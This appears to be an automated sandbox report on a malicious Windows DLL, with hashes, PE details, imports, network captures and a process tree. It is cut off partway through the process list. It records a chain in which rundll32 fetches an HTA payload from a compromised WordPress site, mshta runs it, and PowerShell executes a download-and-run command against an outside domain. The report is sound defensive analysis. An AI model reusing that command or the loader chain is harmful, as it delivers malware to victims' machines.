        Size (bytes):1835008
        Entropy (8bit):4.422408137322667
        Encrypted:false
        SSDEEP:6144:DSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:OvloTMW+EZMM6DFy003w
        MD5:C42F6E4AA72144DBCF915327F9054505
        SHA1:0FC47DE3FE3BA4115760A6303B3CAF6BB2D5EFBD
        SHA-256:CF7C000A0A82353A625415FD0DF2D81200DF2B6425D93BE09044592E6E73D1C5
        SHA-512:DFAD821852176182DF0933D229D20FE98E28FD51F372CECB3284ED0F7C4F1B1261615F180A19AAAFA64E966A4E7AE777C54AD14B7D0DB0A9AC215426753014F6
        Malicious:false
        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...b.................................................................................................................................................................................................................................................................................................................................................;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
        Entropy (8bit):4.2881181598635445
        TrID:
        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
        • Win64 Executable (generic) (12005/4) 10.17%
        • Generic Win/DOS Executable (2004/3) 1.70%
        • DOS Executable Generic (2002/1) 1.70%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
        File name:UPazTgVGA7.dll
        File size:12'288 bytes
        MD5:e3493cc788d91b70277729ea748cce0d
        SHA1:f1246730dafb3bf93f98d5b08baa5315626fb28a
        SHA256:08a15e5718a53a317604d19b4ea49f1844d7a53af353808e7bfb9dc81cfe2342
        SHA512:b3d8b2df1b2976e0564490a65d444ede91654959af0ac7ed3f175cda9a70aa16497b9fb1b16923449c65c6e521cf93e4e99f77a66ee30e9ee7e45594b9bb1ac5
        SSDEEP:192:iL29RBzDzeobchBj8JON1ONerumrEPEjr7Ah6:829jnbcvYJOW4umvr7C6
        TLSH:AB42B50EB77354B9C816D174C1EB9771F2B3B42116228B2D07B0C6372FB2A79662ED09
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Mf..........."...$.....,......P.....................................................`... ............................

        File Icon

        Icon Hash:7ae282899bbab082

        Static PE Info

        General

        Entrypoint:0x2b1b81350
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x2b1b80000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, DLL
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Time Stamp:0x664DF29F [Wed May 22 13:26:55 2024 UTC]
        TLS Callbacks:0xb1b81510, 0x2, 0xb1b814e0, 0x2
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:b96aec3ffae7ee03e83bfcd97f055c55

        Entrypoint Preview

        Instruction
        dec eax
        mov eax, dword ptr [00002FE9h]
        mov dword ptr [eax], 00000000h
        jmp 00007F65111EFED3h
        nop word ptr [eax+eax+00000000h]
        nop dword ptr [eax]
        dec eax
        mov edx, ecx
        dec eax
        lea ecx, dword ptr [00005C86h]
        jmp 00007F65111F0E06h
        nop
        dec eax
        lea ecx, dword ptr [00000009h]
        jmp 00007F65111F0019h
        nop dword ptr [eax+00h]
        ret
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        dec eax
        sub esp, 38h
        inc ebp
        xor ecx, ecx
        xor ecx, ecx
        dec esp
        lea eax, dword ptr [00002C50h]
        dec eax
        lea edx, dword ptr [00002C81h]
        dec eax
        mov dword ptr [esp+20h], 00000000h
        call 00007F65111F0070h
        mov dword ptr [esp+28h], 00000000h
        xor ecx, ecx
        dec esp
        lea ecx, dword ptr [00002CE6h]
        dec eax
        mov dword ptr [esp+20h], 00000000h
        dec esp
        lea eax, dword ptr [00002C1Ah]
        dec eax
        lea edx, dword ptr [00002CDBh]
        call dword ptr [00007E11h]
        xor eax, eax
        dec eax
        add esp, 38h
        ret
        nop
        nop
        nop
        nop
        nop
        nop
        jmp dword ptr [00007E0Eh]
        nop
        nop
        nop dword ptr [eax+eax+00000000h]
        dec eax
        sub esp, 28h
        dec eax
        mov eax, dword ptr [000000F5h]

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x80000x5a.edata
        IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x414.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x1c8.pdata
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000x58.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x41200x28.rdata
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x91440xe0.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x13280x140032ff09dc82dde9f98d726538c4dc19a9False0.580859375data5.916762377509803IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0x30000x400x200d8e9584bae269175cbc0023bf508acc9False0.05859375data0.322541603835012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata0x40000x3500x40064cf4dd1b486dd6fa1c801aa0906d0dcFalse0.3759765625data3.334673609437878IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .pdata0x50000x1c80x200feb44b7e1d9d7a1f5c38c8e31cf91009False0.5390625data3.428853958367466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .xdata0x60000x1300x2005ffb25ed738474db92f0d755615a5bf1False0.322265625data2.629423229714015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .bss0x70000xe00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .edata0x80000x5a0x2006196243344bd26972d68bc5879134d71False0.166015625data0.9418501569517403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .idata0x90000x4140x600676ff18ee333ec1f2c163635315b5480False0.283203125data2.7697675983474315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .CRT0xa0000x580x2006c31f3df6e0678b6eb3c26b1ca5e1e0dFalse0.056640625data0.25323120180391656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .tls0xb0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .reloc0xc0000x580x200aaef006c86288ce5a1f076c63d4dc69fFalse0.17578125data0.9130963814717786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Imports

        DLLImport
        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
        msvcrt.dll__iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, realloc, strlen, strncmp, vfprintf
        SHELL32.dllShellExecuteW
        urlmon.dllURLDownloadToFileW

        Exports

        NameOrdinalAddress
        hash10x2b1b83000
        xlAutoOpen20x2b1b813a0

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 22, 2024 18:06:56.908706903 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:56.908740044 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:56.908843040 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:56.915554047 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:56.915565968 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.562136889 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.562261105 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.622812033 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.622840881 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.623128891 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.623178005 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.625715017 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.666544914 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.832674980 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.832701921 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.832750082 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:57.832926035 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.832926035 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.882435083 CEST49706443192.168.2.5194.124.213.167
        May 22, 2024 18:06:57.882458925 CEST44349706194.124.213.167192.168.2.5
        May 22, 2024 18:06:59.564702034 CEST4971380192.168.2.591.222.173.38
        May 22, 2024 18:06:59.605520964 CEST804971391.222.173.38192.168.2.5
        May 22, 2024 18:06:59.605608940 CEST4971380192.168.2.591.222.173.38
        May 22, 2024 18:06:59.615890026 CEST4971380192.168.2.591.222.173.38
        May 22, 2024 18:06:59.657457113 CEST804971391.222.173.38192.168.2.5
        May 22, 2024 18:07:02.241275072 CEST4971680192.168.2.591.222.173.38
        May 22, 2024 18:07:02.246532917 CEST804971691.222.173.38192.168.2.5
        May 22, 2024 18:07:02.246607065 CEST4971680192.168.2.591.222.173.38
        May 22, 2024 18:07:02.247396946 CEST4971680192.168.2.591.222.173.38
        May 22, 2024 18:07:02.297301054 CEST804971691.222.173.38192.168.2.5
        May 22, 2024 18:07:21.001909971 CEST804971391.222.173.38192.168.2.5
        May 22, 2024 18:07:21.002120972 CEST4971380192.168.2.591.222.173.38
        May 22, 2024 18:07:21.017606974 CEST4971380192.168.2.591.222.173.38
        May 22, 2024 18:07:21.019998074 CEST4973380192.168.2.591.222.173.38
        May 22, 2024 18:07:21.053293943 CEST804971391.222.173.38192.168.2.5
        May 22, 2024 18:07:21.099318981 CEST804973391.222.173.38192.168.2.5
        May 22, 2024 18:07:21.099404097 CEST4973380192.168.2.591.222.173.38
        May 22, 2024 18:07:21.099709988 CEST4973380192.168.2.591.222.173.38
        May 22, 2024 18:07:21.149245024 CEST804973391.222.173.38192.168.2.5
        May 22, 2024 18:07:23.632251024 CEST804971691.222.173.38192.168.2.5
        May 22, 2024 18:07:23.632770061 CEST4971680192.168.2.591.222.173.38
        May 22, 2024 18:07:23.634923935 CEST4971680192.168.2.591.222.173.38
        May 22, 2024 18:07:23.636194944 CEST4973480192.168.2.591.222.173.38
        May 22, 2024 18:07:23.688515902 CEST804971691.222.173.38192.168.2.5
        May 22, 2024 18:07:23.739648104 CEST804973491.222.173.38192.168.2.5
        May 22, 2024 18:07:23.739834070 CEST4973480192.168.2.591.222.173.38
        May 22, 2024 18:07:23.739954948 CEST4973480192.168.2.591.222.173.38
        May 22, 2024 18:07:23.794073105 CEST804973491.222.173.38192.168.2.5
        May 22, 2024 18:07:42.490109921 CEST804973391.222.173.38192.168.2.5
        May 22, 2024 18:07:42.490180969 CEST4973380192.168.2.591.222.173.38
        May 22, 2024 18:07:42.490452051 CEST4973380192.168.2.591.222.173.38
        May 22, 2024 18:07:42.541254997 CEST804973391.222.173.38192.168.2.5
        May 22, 2024 18:07:45.083749056 CEST804973491.222.173.38192.168.2.5
        May 22, 2024 18:07:45.083826065 CEST4973480192.168.2.591.222.173.38
        May 22, 2024 18:07:45.180996895 CEST4973480192.168.2.591.222.173.38
        May 22, 2024 18:07:45.185904026 CEST804973491.222.173.38192.168.2.5

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 22, 2024 18:06:56.893462896 CEST5698153192.168.2.51.1.1.1
        May 22, 2024 18:06:56.904855967 CEST53569811.1.1.1192.168.2.5
        May 22, 2024 18:06:59.491966963 CEST5799853192.168.2.51.1.1.1
        May 22, 2024 18:06:59.546125889 CEST53579981.1.1.1192.168.2.5

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        May 22, 2024 18:06:56.893462896 CEST192.168.2.51.1.1.10x4003Standard query (0)www.siguefutbol.comA (IP address)IN (0x0001)false
        May 22, 2024 18:06:59.491966963 CEST192.168.2.51.1.1.10x7a60Standard query (0)iapartmentlistings.comA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        May 22, 2024 18:06:56.904855967 CEST1.1.1.1192.168.2.50x4003No error (0)www.siguefutbol.comsiguefutbol.comCNAME (Canonical name)IN (0x0001)false
        May 22, 2024 18:06:56.904855967 CEST1.1.1.1192.168.2.50x4003No error (0)siguefutbol.com194.124.213.167A (IP address)IN (0x0001)false
        May 22, 2024 18:06:59.546125889 CEST1.1.1.1192.168.2.50x7a60No error (0)iapartmentlistings.com91.222.173.38A (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • www.siguefutbol.com
        • iapartmentlistings.com

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.54971391.222.173.38807200C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        May 22, 2024 18:06:59.615890026 CEST175OUTGET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.54971691.222.173.38807624C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        May 22, 2024 18:07:02.247396946 CEST175OUTGET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.54973391.222.173.38807200C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        May 22, 2024 18:07:21.099709988 CEST175OUTGET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.54973491.222.173.38807624C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        May 22, 2024 18:07:23.739954948 CEST175OUTGET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549706194.124.213.1674434280C:\Windows\System32\rundll32.exe
        TimestampBytes transferredDirectionData
        2024-05-22 16:06:57 UTC336OUTGET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: www.siguefutbol.com
        Connection: Keep-Alive
        2024-05-22 16:06:57 UTC296INHTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 22 May 2024 16:06:57 GMT
        Content-Type: text/plain
        Content-Length: 2331
        Last-Modified: Wed, 22 May 2024 12:55:26 GMT
        Connection: close
        Vary: Accept-Encoding
        ETag: "664deb3e-91b"
        Strict-Transport-Security: max-age=31536000
        Accept-Ranges: bytes
        2024-05-22 16:06:57 UTC2331INData Raw: 3c 68 65 61 64 3e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0d 0a 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 69 63 6f 6e 3d 22 23 22 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 20 53 59 53 4d 45 4e 55 3d 22 6e 6f 22 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 20 2f 3e 20 20 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 76 62 73 63 72 69 70 74 22 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
        Data Ascii: <head> <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script type="text/vbscript">


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\loaddll64.exe
        Wow64 process (32bit):false
        Commandline:loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"
        Imagebase:0x7ff658d80000
        File size:165'888 bytes
        MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:1
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:2
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
        Imagebase:0x7ff7d30b0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:3
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:4
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:8
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:9
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 3504 -s 244
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:12
        Start time:12:06:55
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:13
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
        Imagebase:0x9b0000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        General

        Target ID:15
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        Imagebase:0x1b0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:16
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:17
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
